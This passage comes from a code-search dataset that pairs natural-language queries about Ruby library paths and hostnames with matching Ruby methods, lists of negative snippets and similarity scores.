"def abs_path\n @abs_path ||= \n owner &&\n begin\n @abs_path = EMPTY_ARRAY # recursion lock.\n\n x = path.map { | dir | File.expand_path(expand_string(dir), owner.base_directory) }\n\n arch_dir = arch_dir_value\n if arch_dir\n # arch_dir = [ arch_dir ] unless Array === arch_dir\n x.map! do | dir |\n if File.exist?(dir_arch = File.join(dir, arch_dir))\n dir = [ dir_arch, dir ]\n # $stderr.puts \" arch_dir: dir = #{dir.inspect}\"\n end\n dir\n end\n x.flatten!\n\n # $stderr.puts \" arch_dir: x = #{x.inspect}\"\n end\n\n if remove_non_existant_paths\n x.reject! { | p | ! File.exist?(p) }\n end\n\n @abs_path = x\n end\n end",
"def path_to_root\n path_to_script = Pathname.new(File.expand_path $PROGRAM_NAME)\n path_to_parent = path_to_script.parent\n\n if path_to_parent.basename.to_s == 'bin'\n path_to_parent = path_to_parent.parent\n end\n path_to_parent\n end",
"def basedir\n File.dirname File.absolute_path options[:file]\n end",
"def pwd\n Dir.pwd\n end",
"def work_dir=(path)\n path << '/' unless path.end_with?('/')\n @work_dir = path\n end",
"def full_path_to_remote_dir\n (remote_dir[0] == ?/ ? remote_dir : \"$(pwd)/#{remote_dir}\").chomp('/')\n end",
"def relative_working_dir\n invoke(:rev_parse, '--show-prefix')\n end",
"def is_working_dir path\n File.exist? File.expand_path \".git\", path\n end",
"def directory\n @config.get('WATCH_DIRECTORY') || abort('Missing WATCH_DIRECTORY')\n end",
"def base_path\n @base_path ||= server_path(File.expand_path(Dir.pwd))\n end",
"def workspace_folder\n @pwd\n end",
"def working_directory(v)\n @options[:working_directory] = v\n end",
"def runDir\n if @workflow[:run_directory]\n OpenStudio.toPath(@workflow[:run_directory])\n else\n OpenStudio.toPath('./run')\n end\n end",
"def cwd\n File.expand_path(@options[:cwd] || \".\")\n end",
"def base_dir\n return Gem.dir unless loaded_from\n @base_dir ||= if default_gem? then\n File.dirname File.dirname File.dirname loaded_from\n else\n File.dirname File.dirname loaded_from\n end\n end",
"def root\n settings[:basedir]\n end",
"def pwd\r\n ndev.rpc.command(\"show cli directory\").text.strip\r\n end",
"def osw_dir\n File.dirname(@osw_abs_path)\n end",
"def osw_dir\n File.dirname(@osw_abs_path)\n end",
"def path\n Rails.root.join(ROOT, type, name, executable).to_s\n end",
"def executable_path; end",
"def build_working_dir(&block)\n file_name =\n if block.respond_to?(:source_location)\n block.source_location[0]\n else\n eval(\"__FILE__\", block.binding)\n end\n\n @working_dir = File.expand_path(\n File.join(File.dirname(file_name), \"generated\"))\n end",
"def cfg_dir\n File.join(@full_path, CONFIG_DIR)\n end",
"def path\n @path ||= File.dirname @config_file\n end",
"def dir_path\n File.expand_path(File.dirname(@path))\n end",
"def basedir\n self.class._basedir\n end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def current_path\n ::File.join(install_path, artifact_name, 'current')\n end",
"def dir\n File.dirname(__FILE__)\n end",
"def get_build_dir\n if @build_dir\n File.join(@dirname, @build_dir)\n else\n @dirname\n end\n end",
"def get_build_dir\n if @build_dir\n File.join(@dirname, @build_dir)\n else\n @dirname\n end\n end",
"def root; Pathname(__dir__).parent; end",
"def core_cfg_path\n File.expand_path(ENV[\"DBS_CFGDIR\"].presence || \"~/.db_sucker\")\n end",
"def absolute_parent_path\n File.dirname absolute_path\n end",
"def path\n env[PATH] ||= (env.has_key?(GIT) ? env[GIT].path : Dir.pwd)\n end",
"def root\n File.dirname __dir__\n end",
"def root\n File.dirname __dir__\n end",
"def root_path\n @root_path ||= `git rev-parse --show-toplevel`.chomp\n end",
"def path\n File.join(RH_CONFIG[\"location\"], self.parent.pid.gsub(/:/,\"_\"), \"data\", self.name.first) unless self.parent.nil? or self.name.empty?\n end",
"def dir_base\n File.expand_path(File.dirname(__FILE__)+\"/../..\")\n end",
"def absolutepath\n if absolute?\n self\n elsif to_s == \".\"\n realpath\n else\n parent.absolutepath + self.basename\n end\n end",
"def app_dir_pathname\n @app_dir_pathname ||= Pathname.new(app_name)\n end",
"def where_to_save\n output_dir = @template_options[OUTPUT_DIR]\n # assume absolute\n full_path = output_dir\n if (Pathname.new(output_dir)).relative?\n full_path = File.expand_path(output_dir, Dir.pwd)\n end\n return full_path\n end",
"def path\n application? ? application_path : local_path\n end",
"def repo_path\n if !self.cmd_opt.empty?\n if self.is_git?\n self.fake_path = self.cmd_opt.gsub(\"'\",\"\").split(\"/\")[-1]\n self.real_path = Settings.aq_sh.user_home + \"/\" +\n Settings.aq_sh.user_name + \"/\" +\n Settings.git.repo_path + \"/\" +\n self.username_from_cmd + \"/\" +\n self.fake_path\n return self.real_path\n elsif self.is_hg?\n self.fake_path = self.cmd_opt.split(\" \")[1]\n self.real_path = Settings.aq_sh.user_home + \"/\" +\n Settings.aq_sh.user_name + \"/\" +\n Settings.hg.repo_path + \"/\" +\n self.fake_path\n return self.real_path\n end\n end\n end",
"def root\n return @root if @root\n @root = dir = Dir.pwd\n begin\n dir = File.dirname(dir)\n return @root = dir if File.exist?(File.join(dir, \"#{BASENAME}.rb\"))\n end while dir != '/'\n\n @root\n end",
"def root\n File.expand_path(File.dirname(File.dirname(File.dirname(__dir__))))\n end",
"def __path__\n File.join(root, 'tmp', 'build')\n end",
"def root\n Dir.pwd\n end",
"def locate_root(cwd=Pathname.new(Dir.pwd))\n return cwd.to_s if (cwd + 'config.rb').exist?\n return false if cwd.root?\n locate_root(cwd.parent)\n end",
"def location\n return unless exists?\n folder_pathname.relative_path_from(root_path)\n end",
"def bin_dir\n @bin_dir ||= File.join gem_dir, bindir\n end",
"def this_dir\n File.expand_path(File.dirname(caller_file(caller)))\n end"
] | [
"0.7353413",
"0.70150113",
"0.70150113",
"0.70150113",
"0.6645491",
"0.6588737",
"0.6554053",
"0.6401448",
"0.6390032",
"0.63678426",
"0.6304743",
"0.6300227",
"0.6096617",
"0.60856885",
"0.6035078",
"0.6032209",
"0.5986275",
"0.5929604",
"0.58885217",
"0.58795285",
"0.58795285",
"0.5879041",
"0.58432055",
"0.5841977",
"0.58396256",
"0.5831663",
"0.5831585",
"0.57856",
"0.5748515",
"0.573438",
"0.5732807",
"0.5695668",
"0.5663026",
"0.5662967",
"0.56318563",
"0.5626502",
"0.5623399",
"0.5623399",
"0.5605567",
"0.56019217",
"0.5586736",
"0.5571387",
"0.5570498",
"0.5557112",
"0.5554216",
"0.5543376",
"0.553805",
"0.55375355",
"0.5526193",
"0.5516379",
"0.55041224",
"0.5502063",
"0.55017275",
"0.5481849",
"0.54344475",
"0.5432136",
"0.5426688",
"0.54140365",
"0.54070204",
"0.5400655",
"0.53875405",
"0.5365881",
"0.53637326",
"0.5352937",
"0.5351186",
"0.5351186",
"0.534502",
"0.5343661",
"0.5340551",
"0.5338804",
"0.5337093",
"0.5336446",
"0.5325843",
"0.53135836",
"0.5310704",
"0.5309853",
"0.5291036",
"0.5291036",
"0.52908343",
"0.52888435",
"0.52884394",
"0.5285342",
"0.5277539",
"0.5277539",
"0.52773213",
"0.52696204",
"0.52684706",
"0.526441",
"0.52621204",
"0.52524287",
"0.52524066",
"0.5247494",
"0.52431124",
"0.5237996",
"0.5225435",
"0.5222823",
"0.5222608",
"0.52198076",
"0.5212911",
"0.5205919"
] | 0.735547 | 0 |
Provide the absolute path to this Brewed's lib dir. | def libdir()
LIBDIR
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def lib_path; end",
"def lib_path; end",
"def lib_path; end",
"def _lib_dir\n File.join(get_pref(\"sketchbook.path\"), \"libraries\")\n end",
"def lib_dir\n LIB_DIR\n end",
"def lib_dir\n File.join(root, 'lib')\n end",
"def lib\n File.join(@root, 'lib')\n end",
"def path\n @backend.lib_dir + name_on_disk\n end",
"def lib\n File.join root, 'lib'\n end",
"def lib\n File.join root, 'lib'\n end",
"def lib_root\n File.expand_path(\"../..\", \"#{__FILE__}/lib\")\n end",
"def lib_root\n File.expand_path(\"../..\", \"#{__FILE__}/lib\")\n end",
"def libdir\n if brewed? || from_osx?\n if @min_version.major == 3\n prefix/\"lib/#{xy}/config-#{version.major}.#{version.minor}m\"\n else\n prefix/\"lib/#{xy}/config\"\n end\n else\n Pathname.new(`#{binary} -c \"from distutils import sysconfig; print(sysconfig.get_config_var('LIBPL'))\"`.strip)\n end\n end",
"def lib\n File.join root, 'lib'\n end",
"def lib_path\n File.join( solr_home, 'lib' )\n end",
"def library_path(library_name)\n Pathname.new(lib_dir) + library_name\n end",
"def dependent_library_dir(lib)\n File.join LIB_DIR, lib\n end",
"def library_path\n @library_path ||= nil\n end",
"def app_library_dir\n base_dir = app_sandbox_dir\n if base_dir.nil?\n nil\n else\n File.join(base_dir, 'Library')\n end\n end",
"def source_library_dir(lib)\n File.join base_dir, lib\n end",
"def lib_path=(_arg0); end",
"def lib_path=(_arg0); end",
"def lib_path=(_arg0); end",
"def location\n opts = get_options\n opts['lib']\n end",
"def libraryPath(sourcePath)\n\t'../evothings-libraries/' + sourcePath\nend",
"def component_libpath(cmp)\n vars = component_cmake_vars cmp\n libdir = vars.fetch('INSTALL_LIB_DIR', 'lib')\n File.join component_install_path(cmp), libdir\nend",
"def puppet_repl_lib_dir\n File.expand_path(File.join(File.dirname(File.dirname(File.dirname(__FILE__))), 'lib'))\n end",
"def install_dir(lib)\n if fr = ENV['FAKEROOT']\n return File.join(fr, lib)\n end\n\n lib\nend",
"def lib_out\n @mpc_project.recipe.get_relative_path(@mpc_project.lib_out)\n end",
"def libfile\n libfile = Pathname.new(resource[:lib]).absolute? ? resource[:lib] : \"modules/#{resource[:lib]}\"\n end",
"def default_loadpath\n ['lib']\n end",
"def applicationFilesDirectory\n file_manager = NSFileManager.defaultManager\n library_url = file_manager.URLsForDirectory(NSLibraryDirectory, inDomains:NSUserDomainMask).lastObject\n library_url.URLByAppendingPathComponent(\"Homebrew\")\n end",
"def libfile\n Pathname.new(resource[:lib]).absolute? ? resource[:lib] : \"modules/#{resource[:lib]}\"\n end",
"def sanitized_relative_darwin_lib_dir\n @sanitized_relative_darwin_lib_dir ||= File.join(\n File.dirname(relative_darwin_lib_dir),\n File.basename(relative_darwin_lib_dir).gsub('.', '_')\n )\n end",
"def sanitized_relative_darwin_lib_dir\n @sanitized_relative_darwin_lib_dir ||= File.join(\n File.dirname(relative_darwin_lib_dir),\n File.basename(relative_darwin_lib_dir).gsub('.', '_')\n )\n end",
"def lib_paths\n @mpc_project.recipe.get_relative_paths(@mpc_project.lib_paths)\n end",
"def library_path\n datastore['DLL']\n end",
"def files_dir\n return File.absolute_path(File.join(@root_dir, 'lib', 'files'))\n end",
"def project_path\n if(File.directory?(@library_path))\n # library is source dir\n File.join(project_lib, clean_name)\n else\n # library is a binary (like swc, jar, etc)\n File.join(project_lib, File.basename(@file_target.archive_path))\n end\n end",
"def bundled_path\n File.dirname Wisp::Source.bundled_path\n end",
"def rackup_path_from_rubylib\n env_path_separator = is_windows? ? ';' : ':'\n path_separator = Regexp.escape(File::ALT_SEPARATOR || File::SEPARATOR)\n needle = /#{path_separator}rack#{path_separator}/\n\n paths = ENV[\"RUBYLIB\"].to_s.split(env_path_separator)\n\n if rack_lib = paths.find{|path| path =~ needle }\n path = Pathname.new(rack_lib).parent.join(\"bin\").join(\"rackup\").expand_path\n path if path.file?\n end\n end",
"def additional_folders\n ['lib']\n end",
"def gem_r_lib\n File.expand_path(File.join(File.dirname(__FILE__), %w(.. r_lib)))\n end",
"def library_properties_path\n path + LIBRARY_PROPERTIES_FILE\n end",
"def lib\n\tDir.mkdir('lib')\nend",
"def path\n @path ||= [\".\", \"~/.statisticus\", gem_r_lib].map {|path| File.expand_path(path)}.delete_if {|path| not File.exist?(path)}\n end",
"def package_dir_path\n \"#{package_dir}/#{package_name}\"\n end",
"def hadoop_lib_dir\n if hdp22?\n \"/usr/hdp/#{hdp_version}\"\n else\n '/usr/lib'\n end\n end",
"def puppet_debugger_lib_dir\n File.expand_path(File.join(File.dirname(File.dirname(File.dirname(__FILE__))), 'lib'))\n end",
"def libpath( *args )\n rv = args.empty? ? LIBPATH : ::File.join(LIBPATH, args.flatten)\n if block_given?\n begin\n $LOAD_PATH.unshift LIBPATH\n rv = yield\n ensure\n $LOAD_PATH.shift\n end\n end\n return rv\n end",
"def libpath( *args )\n rv = args.empty? ? LIBPATH : ::File.join(LIBPATH, args.flatten)\n if block_given?\n begin\n $LOAD_PATH.unshift LIBPATH\n rv = yield\n ensure\n $LOAD_PATH.shift\n end\n end\n return rv\n end",
"def hadoop_lib_dir\n if hdp22?\n \"/usr/hdp/#{hdp_version}\"\n elsif iop?\n \"/usr/iop/#{node['hadoop']['distribution_version']}\"\n else\n '/usr/lib'\n end\n end",
"def PATH()\n $LOAD_MANAGER.PATH()\n end",
"def private_bin_dir\n return pretty_path(File.join(right_link_home_dir, 'bin'))\n end",
"def libpath( *args, &block )\n rv = args.empty? ? LIBPATH : ::File.join(LIBPATH, args.flatten)\n if block\n begin\n $LOAD_PATH.unshift LIBPATH\n rv = block.call\n ensure\n $LOAD_PATH.shift\n end\n end\n return rv\n end",
"def dir_base\n File.expand_path(File.dirname(__FILE__)+\"/../..\")\n end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def app_library_preferences_dir\n base_dir = app_library_dir\n if base_dir.nil?\n nil\n else\n File.join(base_dir, 'Preferences')\n end\n end",
"def install_dir # :nodoc:\n File.join Gem.dir, 'bundler', 'gems', \"#{@name}-#{dir_shortref}\"\n end",
"def my_path\n File.expand_path(File.dirname(__FILE__))\n end",
"def default_path\n Gem.default_path + [@home]\n end",
"def base_dir\n return Gem.dir unless loaded_from\n @base_dir ||= if default_gem? then\n File.dirname File.dirname File.dirname loaded_from\n else\n File.dirname File.dirname loaded_from\n end\n end",
"def bundle_dir\n File.expand_path(File.join(Bixby.repo_path, self.relative_path))\n end",
"def gem_root\n @@root\n end",
"def gem_dir\n directory = File.join(File.dirname(__FILE__), \"..\")\n File.expand_path(directory, File.dirname(__FILE__))\n end",
"def package_dir\n config.package_dir\n end",
"def applicationFilesDirectory\n file_manager = NSFileManager.defaultManager\n library_url = file_manager.URLsForDirectory(NSLibraryDirectory, inDomains:NSUserDomainMask).lastObject\n library_url.URLByAppendingPathComponent(\"Hubcap\")\n end",
"def gem_path\n File.expand_path(File.join(File.dirname(__FILE__), '..', '..'))\n end",
"def bin_dir\n @bin_dir ||= File.join gem_dir, bindir\n end",
"def lib(droplet)\n candidate = manifest_lib_dir(droplet)\n return candidate if candidate&.exist?\n\n candidate = boot_inf_lib_dir(droplet)\n return candidate if candidate&.exist?\n\n candidate = web_inf_lib_dir(droplet)\n return candidate if candidate&.exist?\n\n candidate = lib_dir(droplet)\n return candidate if candidate&.exist?\n\n raise 'No lib directory found'\n end",
"def lib_paths(lib_path = nil)\n @lib_paths.assign(lib_path) if lib_path\n @lib_paths\n end",
"def gem_root\n Pathname.new(__FILE__).dirname.parent.parent.expand_path\n end",
"def gem_dir\n @gem_dir ||= File.expand_path File.join(gems_dir, full_name)\n end",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def local_path\n check_and_copy_local_file_to_rails_public\n File.join('ajaxlibs', library_name, version, file_name)\n end",
"def lib_dirs(val = NULL)\n if null?(val)\n @lib_dirs || [windows_safe_path(\"#{install_dir}/embedded/lib\")]\n else\n @lib_dirs = val\n end\n end",
"def base_dir # :nodoc:\n File.join @root_dir, 'bundler'\n end",
"def mklib(path, home_path = true)\n \n if (home_path)\n lib = path + \"/lib\"\n else\n lib = path\n end\n \n $LOAD_PATH << lib\n \nend",
"def scripts_folder\n HOMEBREW_PREFIX/\"share/pypy#{abi_version}\"\n end",
"def absolute_db_path\n pn = Pathname.new(__FILE__)\n install_dir = pn.dirname.parent.parent.to_s + Pathname::SEPARATOR_LIST\n install_dir + @storage_location + @database_name\n end",
"def base_path\n Dir.pwd + \"/\"\n end",
"def lib_dirs_glob\n dirs = if self.raw_require_paths\n if self.raw_require_paths.size > 1\n \"{#{self.raw_require_paths.join(',')}}\"\n else\n self.raw_require_paths.first\n end\n else\n \"lib\" # default value for require_paths for bundler/inline\n end\n\n \"#{self.full_gem_path}/#{dirs}\".dup.tap(&Gem::UNTAINT)\n end",
"def basedir\n self.class._basedir\n end",
"def reference_directory\n @reference_directory ||= set_reference_directory\n end",
"def user_path\n load_path = $LOAD_PATH - ruby_library_locations\n load_path = load_path.reject{ |p| gem_paths.any?{ |g| p.start_with?(g) } }\n end",
"def lib\n @obj['lib']\n end",
"def actors_dir\n File.join(root_path, 'actors', 'lib')\n end",
"def relative_directory; end",
"def gem_dir\n if File.directory?(dir = File.join(working_dir, 'gems'))\n dir\n end\n end",
"def gem_dir\n if File.directory?(dir = File.join(working_dir, 'gems'))\n dir\n end\n end",
"def gem_path\n @path || downloaded_gem_path\n end",
"def project_lib\n if(library_path.index('.swc'))\n @project_lib ||= ProjectModel.instance.swc_dir\n else\n @project_lib ||= ProjectModel.instance.lib_dir\n end\n end",
"def dir_of(book_id)\n File.expand_path(LibraryLocator.identity(book_id).relpath, root)\n end"
] | [
"0.7990427",
"0.7990427",
"0.7990427",
"0.79743385",
"0.7927845",
"0.7907323",
"0.77938616",
"0.7615941",
"0.7605704",
"0.7605704",
"0.7589429",
"0.7589429",
"0.7515817",
"0.7508454",
"0.7396474",
"0.73448074",
"0.72190243",
"0.72182333",
"0.7168761",
"0.7134664",
"0.7123414",
"0.7123414",
"0.7123414",
"0.7091849",
"0.68335974",
"0.68297344",
"0.6826657",
"0.67938036",
"0.67724645",
"0.6745398",
"0.67441857",
"0.6628283",
"0.6578106",
"0.65761983",
"0.65761983",
"0.65280676",
"0.650653",
"0.6493036",
"0.64908594",
"0.6487169",
"0.6466802",
"0.64529335",
"0.6444142",
"0.6439845",
"0.64350903",
"0.6431174",
"0.64022404",
"0.6370016",
"0.6369875",
"0.6353616",
"0.6289966",
"0.62891483",
"0.6288392",
"0.6278814",
"0.6271686",
"0.62684226",
"0.6262435",
"0.6262435",
"0.6262435",
"0.6262435",
"0.6262435",
"0.6262435",
"0.6262435",
"0.62547106",
"0.6239759",
"0.62339145",
"0.6180892",
"0.61773103",
"0.61671644",
"0.61653554",
"0.6156007",
"0.61519647",
"0.6147482",
"0.61445546",
"0.6137922",
"0.61354434",
"0.60983145",
"0.6097641",
"0.6093235",
"0.6093066",
"0.6087558",
"0.60752386",
"0.6073309",
"0.6056657",
"0.6053082",
"0.6038149",
"0.60234725",
"0.6017282",
"0.6011149",
"0.60109997",
"0.60107726",
"0.6000738",
"0.60005116",
"0.5951825",
"0.59465533",
"0.5943867",
"0.5943867",
"0.5942994",
"0.59357506",
"0.5935098"
] | 0.79928905 | 0 |
Returns the current host's name in canonical form (lowercase with domain information stripped). | def hostname()
unless @host.is_str?
@host = ENV['HOSTNAME']
@host = `/bin/hostname` unless @host.is_str?
raise "Failed to determine current HOSTNAME" unless @host.is_str?
@host = @host.downcase.sub(/\..*$/, '').strip
raise "Failed to determine current HOSTNAME" unless @host.is_str?
end
@host = @host.to_sym
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def canonical\n dns_host_name\n end",
"def canonical\n dns_name\n end",
"def canonicalize_hostname(hostname)\n Addrinfo.getaddrinfo(hostname, nil, nil, nil, nil, Socket::AI_CANONNAME).first.canonname\n end",
"def canonical_cname(cname)\n # DNS host names are case-insensitive. Trim trailing dot(s).\n cname &&= cname.downcase.sub(/\\.*\\Z/, '')\n cname\n end",
"def canonical_hostname(domain)\n # Allow hostname overrides\n return $override_dashboard if $override_dashboard && domain == 'studio.code.org'\n return $override_pegasus if $override_pegasus && domain == 'code.org'\n\n return \"#{name}.#{domain}\" if ['console', 'hoc-levels'].include?($node_name)\n return domain if $node_env == 'production'\n\n # our HTTPS wildcard certificate only supports *.code.org\n # 'env', 'studio.code.org' over https must resolve to 'env-studio.code.org' for non-prod environments\n sep = (domain.include?('.code.org')) ? '-' : '.'\n return \"localhost#{sep}#{domain}\" if $node_env == 'development'\n return \"translate#{sep}#{domain}\" if $node_name == 'crowdin'\n \"#{$node_env}#{sep}#{domain}\"\nend",
"def normalized_host\n # Remove trailing '.' characters\n host.sub(/\\.*$/, '').downcase if host\n end",
"def cname\n self[:cname] || domain_names&.first&.canonicalize_cname\n end",
"def cname\n self[:cname] || domain_names&.first&.canonicalize_cname\n end",
"def hostname\n Socket.gethostname.split('.').first.strip\n end",
"def hostname\n v = self.host\n v&.start_with?('[') && v.end_with?(']') ? v[1..-2] : v\n end",
"def hostname\n @hostname ||= `hostname`.strip\n end",
"def hostname\n @hostname ||= `hostname`.chomp\n end",
"def ssh_host_name( host )\n # This is included here for expected Space-wide policy settings.\n host[ :internet_name ] || host[ :internet_ip ] || host.name\n end",
"def get_server_hostname\n (`hostname`).strip\n end",
"def dns_host_name\n @dns_host_name ||= ::SimpleIDN.to_ascii(@host_name)\n end",
"def hostname\n if (host = @host.at('tag[name=host-fqdn]'))\n host.inner_text\n end\n end",
"def normalized_host; end",
"def fqdn\n exit_code, stdout = ssh.exec(\"hostname --fqdn\")\n (exit_code == 0) ? stdout.chomp : \"\"\n end",
"def fqdn\n ssh.exec!(\"hostname --fqdn\").chomp\n end",
"def hostname\n Socket.gethostname\n end",
"def hostname\n Socket.gethostname\n end",
"def hostname\n if resolution = CloudModel::AddressResolution.where(ip: ip).first\n resolution.name\n else\n begin\n Resolv.getname(ip)\n rescue\n ip\n end\n end\n end",
"def this_host_name\n if is_zz?\n return zz[:local_hostname]\n end\n\n return @this_host_name if @this_host_name != nil\n\n instances = ey['environment']['instances']\n # assume localhost if can't find\n @this_host_name = 'localhost'\n\n this_id = this_instance_id\n instances.each do |instance|\n if instance['id'] == this_id\n @this_host_name = instance['private_hostname']\n break\n end\n end\n @this_host_name\n end",
"def hostname\n protocol = request.headers['HTTP_X_FORWARDED_PROTO'] ||\n request.protocol ||\n 'http'\n protocol += '://' unless protocol.match?(%r{://})\n\n \"#{protocol}#{request.host}\"\n end",
"def hostname\n FFI::Libvirt.virConnectGetHostname(pointer)\n end",
"def hostname\n Socket.gethostname\n end",
"def hostname\n Resolv.getname(ip_address) rescue nil\n end",
"def normalize(domain)\n domain = domain.chomp(DOT).unicode_normalize(:nfc) unless domain.ascii_only?\n Punycode.encode_hostname(domain).downcase\n end",
"def public_dns_name\n data[:public_dns_name]\n end",
"def get_domain_name(host)\n domain = nil\n search = nil\n resolv_conf = if host['platform'].include?('windows')\n if host.is_cygwin?\n host.exec(Command.new(\"cat /cygdrive/c/Windows/System32/drivers/etc/hosts\")).stdout\n else\n host.exec(Command.new('type C:\\Windows\\System32\\drivers\\etc\\hosts')).stdout\n end\n else\n host.exec(Command.new(\"cat /etc/resolv.conf\")).stdout\n end\n resolv_conf.each_line do |line|\n if (match = /^\\s*domain\\s+(\\S+)/.match(line))\n domain = match[1]\n elsif (match = /^\\s*search\\s+(\\S+)/.match(line))\n search = match[1]\n end\n end\n return_value ||= domain\n return_value ||= search\n\n return unless return_value\n\n return_value.gsub(/\\.$/, '')\n end",
"def name\n ssh.exec!(\"hostname\").chomp\n end",
"def hostname\n ssh.exec!(\"hostname\").chomp\n end",
"def hostname\n hostname = nil\n run \"hostname\" do |channel, stream, data|\n hostname = data.chomp\n end\n hostname\n end",
"def dns_name\n [\"public\", fqdn].join(\".\")\n end",
"def ssh_hostname\n name = \"\"\n Net::SSH.start(@ip, \"pipeline\") do |ssh|\n name = ssh.exec! \"hostname -s\"\n end\n name.downcase.chomp\n end",
"def hostname\n return @hostname\n end",
"def domain\n unless @domain\n if defined? ActiveSupport::CoreExtensions::String::Inflections\n @domain = name.tableize\n else\n @domain = name.downcase\n end\n end\n @domain\n end",
"def get_public_hostname\n rpc_get_fact_direct('public_hostname')\n end",
"def hostname\n (request.env['HTTP_X_FORWARDED_SERVER'] =~ /[a-z]*/) ? request.env['HTTP_X_FORWARDED_SERVER'] : request.env['HTTP_HOST']\n end",
"def human_name\n Helpers.underscore(@name)\n end",
"def name\n if ipv4?\n \"[#{ip_address}]\"\n elsif ipv6?\n \"[IPv6:#{ip_address}]\"\n elsif @config[:host_encoding] && @config[:host_encoding] == :unicode\n ::SimpleIDN.to_unicode(host_name)\n else\n dns_name\n end\n end",
"def peer_hostname\n (error, name) = Cproton.pn_ssl_get_peer_hostname(@impl, 1024)\n raise SSLError.new if error < 0\n return name\n end",
"def current_company_name\n begin\n Client.find(current_subdomain).webname\n rescue\n \"\"\n end\n end",
"def determine_hostname\n @info[:hostname] = @shell.query('HOST', 'hostname')\n end",
"def name\n \"#{self[:host]}\"\n end",
"def fqdn(gear_name = nil)\n \"#{gear_name || canonical_name}-#{domain_namespace}.#{Rails.configuration.openshift[:domain_suffix]}\"\n end",
"def short\n return '' if name == domain.name\n return '' if name.blank?\n\n File.basename(name, \".#{domain.name}\")\n end",
"def host\n\t\t\t# FIXME: This is both a hack and the best way I know to do this.\n\t\t\tSocket.getaddrinfo(Socket.gethostname, 0)[0][2]\n\t\tend",
"def hostname\n @hostname ||= ENV['HOSTNAME'] || `hostname`.delete(\"\\n\")\n end",
"def get_server_domain\n @hostname ||= Socket.gethostname\n end",
"def clean_name\n global? ? registry.hostname : name\n end",
"def clean_name\n global? ? registry.hostname : name\n end",
"def domain_name\n @domain_name ||= default_name\n end",
"def hostname\n @hostname ||= ENV['HOSTNAME'] || `hostname`.chomp\n end",
"def hostname\n name + '.localhost'\n end",
"def themed_host_name\n map2tags.compact.join('-')\n end",
"def base_distinguished_name\n base_name = \"\"\n AD_DOMAIN.split('.').each do |item|\n base_name+=\"dc=#{item},\"\n end\n base_name.chop\n end",
"def host_as_string; end",
"def hostname\n return 'unknown' unless available?\n @hostname ||= ssh_cmd('hostname').chomp\n end",
"def hostname\n if @hostname.nil?\n @hostname = ENV[\"COMPUTERNAME\"]\n @hostname = ENV[\"HOSTNAME\"] if @hostname.blank?\n @hostname = `hostname` if @hostname.blank?\n @hostname = @hostname.gsub(/\\.terracotta\\.lan/, '').strip\n end\n \n @hostname\n end",
"def name\n n = self.class.name\n n.gsub!( /::/, '.' )\n n.gsub( /(\\w)\\w+\\./ ) { |m| $1.downcase + '.' }\n end",
"def build_domain_name(env)\n config = env[:machine].provider_config\n domain_name =\n if config.default_prefix.nil?\n env[:root_path].basename.to_s.dup.concat('_')\n elsif config.default_prefix.empty?\n # don't have any prefix, not even \"_\"\n String.new\n else\n config.default_prefix.to_s.dup\n end\n domain_name << env[:machine].name.to_s\n domain_name.gsub!(/[^-a-z0-9_\\.]/i, '')\n domain_name << \"_#{Time.now.utc.to_i}_#{SecureRandom.hex(10)}\" if config.random_hostname\n domain_name\n end",
"def get_hostname\n cmd_exec('uname -n').to_s\n rescue\n raise 'Unable to retrieve hostname'\n end",
"def get_fqdn\n return @resource[:name]\n end",
"def name\n @config.db_name.gsub(/@thismachinehostname@/, Socket.gethostname).\n gsub(/@prefix@/, prefix)\n end",
"def titleized\n self.uri.local_name.titleize\n end",
"def dns_name instance\n instance.dns_name\n end",
"def canonical\n if scientific_names.loaded?\n preferred_scientific_name&.canonical_form\n else\n scientific_names&.preferred&.first&.canonical_form\n end\n end",
"def public_hostname\n get_proxy.get_public_hostname\n end",
"def hostname(node)\n \"#{node.to_s}.smartengine.local\"\nend",
"def conform_name_to_shortname(name = nil)\n name ||= self.name\n name.to_s.downcase.strip.gsub(/[^a-z0-9]+/, \"-\").gsub(/^-|-$/, \"\")\n end",
"def conform_name_to_shortname(name = nil)\n name ||= self.name\n name.to_s.downcase.strip.gsub(/[^a-z0-9]+/, \"-\").gsub(/^-|-$/, \"\")\n end",
"def scheme_with_host(domain=nil)\n ['http://', domain || self.name, '/'].join(\"\")\n end",
"def conform_name_to_shortname(name = nil)\n name ||= self.name\n name.to_s.downcase.lstrip.rstrip.gsub(/[^a-z0-9]+/, '-').gsub(/^-|-$/,'')\n end",
"def conform_name_to_shortname(name = nil)\n name ||= self.name\n name.to_s.downcase.lstrip.rstrip.gsub(/[^a-z0-9]+/, '-').gsub(/^-|-$/,'')\n end",
"def titleized\n self.uri.local_name.titleize\n end",
"def name\n return @name unless @name.nil?\n \"#{@name_prefix}host:#{Socket.gethostname} pid:#{Process.pid}\" rescue \"#{@name_prefix}pid:#{Process.pid}\"\n end",
"def hostname\n host_hash['vmhostname'] || @name\n end",
"def common_name\n self[:CN]\n end",
"def base_hostname\n @username.match(/.com/) ? @username : \"#{@username}.tumblr.com\"\n end",
"def host\n attribute_part('subject', 'CN')\n end",
"def domain_name\n return @domain_name\n end",
"def domain_name\n return @domain_name\n end",
"def realname\r\n return for_context(nil, false) { |c| c.realname }\r\n end",
"def host\n Socket.gethostname\n end",
"def host\n Socket.gethostname\n end",
"def fqdn\n [ hostname, domain ].join('.') unless hostname.nil? and domain.nil?\n end",
"def namify\n self.name.split(\" \").map{|x| x.first.capitalize}[0..1].join(\"\")\n end",
"def canonical_name #:nodoc:\n if parent.nil?\n \"\"\n elsif parent.parent.nil?\n name\n else\n parent.canonical_name + \"[#{name}]\" \n end\n end",
"def fqdn\n [name, tag, domain].compact.join('.')\n end",
"def build_hostname\n hostname\n end",
"def hostname(ip_address)\n @resolver.getname(ip_address).to_s\n rescue\n 'IP address not found'\n end",
"def name\n camel = self.class.to_s.gsub(/.*::/, '')\n camel.gsub(/(\\S)([A-Z])/, '\\1_\\2').downcase\n end",
"def new_hostname\n host || incremented_hostname || local_host_name\n end",
"def simple_name\n name.split('::').last\n end",
"def simple_name\n name.split('::').last\n end",
